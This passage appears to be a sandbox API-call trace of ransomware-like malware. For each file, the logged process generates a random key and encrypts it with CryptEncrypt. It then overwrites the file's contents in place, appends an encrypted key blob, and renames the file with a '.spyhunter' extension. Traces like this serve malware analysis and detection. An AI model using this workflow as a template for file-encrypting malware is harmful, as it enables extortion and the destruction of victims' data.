lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.169] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x270e6c4*, lpNumberOfBytesWritten=0x270e684*=0x4, lpOverlapped=0x0) returned 1 [0167.277] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e684*=0x30, lpOverlapped=0x0) returned 1 [0167.277] CloseHandle (hObject=0x9c) returned 1 [0167.277] GetProcessHeap () returned 0x2c0000 [0167.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.277] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.spyhunter") returned 96 [0167.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.spyhunter")) returned 1 [0167.278] GetProcessHeap () returned 0x2c0000 [0167.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.278] GetProcessHeap () returned 0x2c0000 [0167.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.278] GetProcessHeap () returned 0x2c0000 [0167.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9fd0 | out: hHeap=0x2c0000) returned 1 [0167.278] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6c0 | out: pbBuffer=0x270e6c0) returned 1 [0167.279] GetProcessHeap () returned 0x2c0000 [0167.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.279] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6b8*=0x30) returned 1 [0167.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.279] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt") returned 64 [0167.279] StrStrW (lpFirst="THIRDPARTYLICENSEREADME.txt", lpSrch=".txt") returned=".txt" [0167.279] lstrlenW (lpString=".txt") returned 4 [0167.280] lstrlenW (lpString=".txt") returned 4 [0167.280] GetProcessHeap () returned 0x2c0000 [0167.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.280] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.434] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.434] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.436] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.436] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.436] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.436] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.437] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.437] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.437] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.437] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.438] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.438] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.438] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.438] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.438] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.438] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.438] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.439] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.439] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.439] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.439] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.439] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.439] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.440] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.440] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.440] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.440] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.440] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.440] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0x2800, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e67c*=0xb50, lpOverlapped=0x0) returned 1 [0167.441] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff4b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.441] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xb50, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e67c*=0xb50, lpOverlapped=0x0) returned 1 [0167.441] GetProcessHeap () returned 0x2c0000 [0167.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.441] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.441] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x270e6bc*, lpNumberOfBytesWritten=0x270e67c*=0x4, lpOverlapped=0x0) returned 1 [0167.441] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e67c*=0x30, lpOverlapped=0x0) returned 1 [0167.441] CloseHandle (hObject=0x9c) returned 1 [0167.442] GetProcessHeap () returned 0x2c0000 [0167.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.442] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.spyhunter") returned 74 [0167.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt.spyhunter")) returned 1 [0167.443] GetProcessHeap () returned 0x2c0000 [0167.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.443] GetProcessHeap () returned 0x2c0000 [0167.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.443] GetProcessHeap () returned 0x2c0000 [0167.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e052e8 | out: hHeap=0x2c0000) returned 1 [0167.443] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6c0 | out: pbBuffer=0x270e6c0) returned 1 [0167.443] GetProcessHeap () returned 0x2c0000 [0167.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6b8*=0x30) returned 1 [0167.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7") returned 56 [0167.460] StrStrW (lpFirst="MST7", lpSrch=".txt") returned 0x0 [0167.460] GetProcessHeap () returned 0x2c0000 [0167.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.460] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e67c*=0x1b, lpOverlapped=0x0) returned 1 [0167.461] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.461] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e67c*=0x1b, lpOverlapped=0x0) returned 1 [0167.461] GetProcessHeap () returned 0x2c0000 [0167.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.461] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.461] WriteFile (in: hFile=0x178, lpBuffer=0x270e6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x270e6bc*, lpNumberOfBytesWritten=0x270e67c*=0x4, lpOverlapped=0x0) returned 1 [0167.461] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e67c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e67c*=0x30, lpOverlapped=0x0) returned 1 [0167.461] CloseHandle (hObject=0x178) returned 1 [0167.461] GetProcessHeap () returned 0x2c0000 [0167.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.462] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7.spyhunter") returned 66 [0167.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7.spyhunter")) returned 1 [0167.463] GetProcessHeap () returned 0x2c0000 [0167.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.463] GetProcessHeap () returned 0x2c0000 [0167.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.463] GetProcessHeap () returned 0x2c0000 [0167.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7f78 | out: hHeap=0x2c0000) returned 1 [0167.463] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6b8 | out: pbBuffer=0x270e6b8) returned 1 [0167.463] GetProcessHeap () returned 0x2c0000 [0167.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.463] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6b0*=0x30) returned 1 [0167.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6") returned 56 [0167.464] StrStrW (lpFirst="CST6", lpSrch=".txt") returned 0x0 [0167.464] GetProcessHeap () returned 0x2c0000 [0167.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.464] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e674*=0x1b, lpOverlapped=0x0) returned 1 [0167.465] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.465] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e674*=0x1b, lpOverlapped=0x0) returned 1 [0167.466] GetProcessHeap () returned 0x2c0000 [0167.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.466] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.466] WriteFile (in: hFile=0x178, lpBuffer=0x270e6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x270e6b4*, lpNumberOfBytesWritten=0x270e674*=0x4, lpOverlapped=0x0) returned 1 [0167.466] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e674*=0x30, lpOverlapped=0x0) returned 1 [0167.466] CloseHandle (hObject=0x178) returned 1 [0167.466] GetProcessHeap () returned 0x2c0000 [0167.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.466] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6.spyhunter") returned 66 [0167.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6.spyhunter")) returned 1 [0167.467] GetProcessHeap () returned 0x2c0000 [0167.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.467] GetProcessHeap () returned 0x2c0000 [0167.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.467] GetProcessHeap () returned 0x2c0000 [0167.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7bb8 | out: hHeap=0x2c0000) returned 1 [0167.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, 